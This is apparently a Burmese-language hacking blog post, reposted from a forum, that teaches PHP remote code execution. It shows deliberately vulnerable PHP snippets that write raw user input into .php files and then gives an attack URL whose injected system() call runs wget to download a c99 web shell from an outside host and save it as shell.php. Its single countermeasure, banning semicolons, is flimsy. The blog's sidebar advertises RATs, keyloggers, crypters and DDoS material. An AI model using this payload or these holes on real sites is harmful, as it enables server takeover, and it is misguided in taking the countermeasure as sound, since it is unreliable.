ထံုးစံအတုိင္း ဘယ္လိုေတြ ေပါက္လဲ ဘယ္လို ေနရာေတြမွာေပါက္သြားလဲ တစ္ခ်က္ၾကည့္ရေအာင္ ။
How Vulnerability comes?

Code


[color=#00ff00][size=1][font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]<?php[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]$code=$_GET['code'];[/font]
vuln[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]($code);[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]?>[/font][/size][/color]

Code ထဲက vuln ဆိုတဲ့ Function ဟာ string ကို PHP Code အျဖစ္နဲ႕ ေျပာင္းလဲေပးသြားမွာျဖစ္ျပီး အဲ့ဒါေၾကာင့္ ကၽြန္ေတာ္တုိ႕ဟာ Code ေတြကို Execute လုပ္ခြင့္ရွိမွာ ျဖစ္ပါတယ္
တကယ္ေတာ့ ဒီဟာက သီအိုရီဆန္လြန္းပါတယ္ လက္ေတြ႕မွာျဖစ္တတ္တဲ့ အေၾကာင္းအရာေလးေတြ ၾကည့္ရေအာင္

Type 1 :

Blog တစ္ခုထံုးစံအတုိင္း Comment ေပးတဲ့ေနရာ ရွိမယ္ ။
Comment Form ဆိုတဲ့အတိုင္း Submit Form နဲ႕ Comment.php ကို ခ်ိတ္ထားမယ္ေပါ့ ။ submit.php နဲ႕ comment.php ဆိုပါစို႕
Submit.php ကိုၾကည့္ရေအာင္

submit.php

Code:

[color=#00ff00][font=Times New Roman,serif][size=3]<[/size][/font][font=Times New Roman,serif][size=3]form method="POST" action="">[/size][/font]
[font=Times New Roman,serif][size=3]<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>[/size][/font][/color]

Comment.php ကိုၾကည့္ရေအာင္

comments.php

Code:

<?php
[color=#00ff00][font=Times New Roman,serif][size=3]$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);
fclose($log);
?>[/size][/font][/color]

ဒီလိုဆိုရင္ submit form က သြင္းသမွ်ကို Comment.php မွာ သြားျပီး သက္ေရာက္ေနမွာျဖစ္ပါတယ္ ။ ဒါေၾကာင့္ Malicious Code ကို Inject လုပ္လုိက္ရင္ ျဖစ္လာမယ့္ အက်ိဳးဆက္က ????
အခုေျပာသြားတာက Post Method ကေန ေပါက္သြားတဲ့အေၾကာင္း Get Method ဆိုရင္ေရာ...

Type 2 :

Code:

 [color=#00ff00][font=Times New Roman,serif][size=3]<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>[/size][/font][/color]

ဒီလိုေနရာမွာဆိုရင္ RCE သာမကဘူး XSS လိုဟာမ်ိဳးပါ Inject လုပ္ႏုိင္ပါမယ္ ။
အိုေခ ဒါဆို Attacker ဘယ္လို Attack လုပ္သြားတယ္ဆုိတာကို ဆက္ရေအာင္ ။

How they Attack?

Attacker က ခုနက Type 2 လို Get Method မွာ RCE ေပါက္ေနတာကို ေတြ႕ျပီဆိုပါစို႕ ဒါဆို String တစ္ေၾကာင္း ေခၚျပီး Attack လုပ္ပါမယ္ တျခားေနရာက Shell ကို ေခၚယူခိုင္းလိုက္တာမ်ိဳးေပါ့

www.site.com/vuln.php?hack=1 ဆိုပါစို႕
အဲ့လိုေနရာမွာ
www.site.com/vuln.php?hack=<?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?>

ေနာက္က <?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?> ဆိုတာကို နည္းနည္းေျပာဖို႕ လိုမယ္ထင္ပါတယ္

wget ဆိုတာ we get ပါ တျခားေနရာက ယူမယ္ေပါ့ ဘာကို ယူမလ www.sh3ll.org/c99.txt ကို ယူမယ္
-O ဆိုတာ Out put အျဖစ္ထြက္ပါေပါ့ ဘယ္လို ထြက္ရမလဲ c99.txt ဆိုတဲ့ text file ကုိ shell.php ဆုိတဲ့ PHP File အျဖစ္ ထုတ္ပါလုိ႕ ေျပာလိုက္တာပါ .. ဒါဆို ဘာဆက္လုပ္မလ ဆိုတာ သိေလာက္ပါျပီ ;-)

Countermeasures

အကယ္၍မ်ား ; ကို ကန္႕သတ္လိုက္မယ္ဆိုရင္ PHP Code ေတြအလုပ္လုပ္ေတာ့မွာမဟုတ္ပါဘူး 
 
post by negative thunder
copy from MHF
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology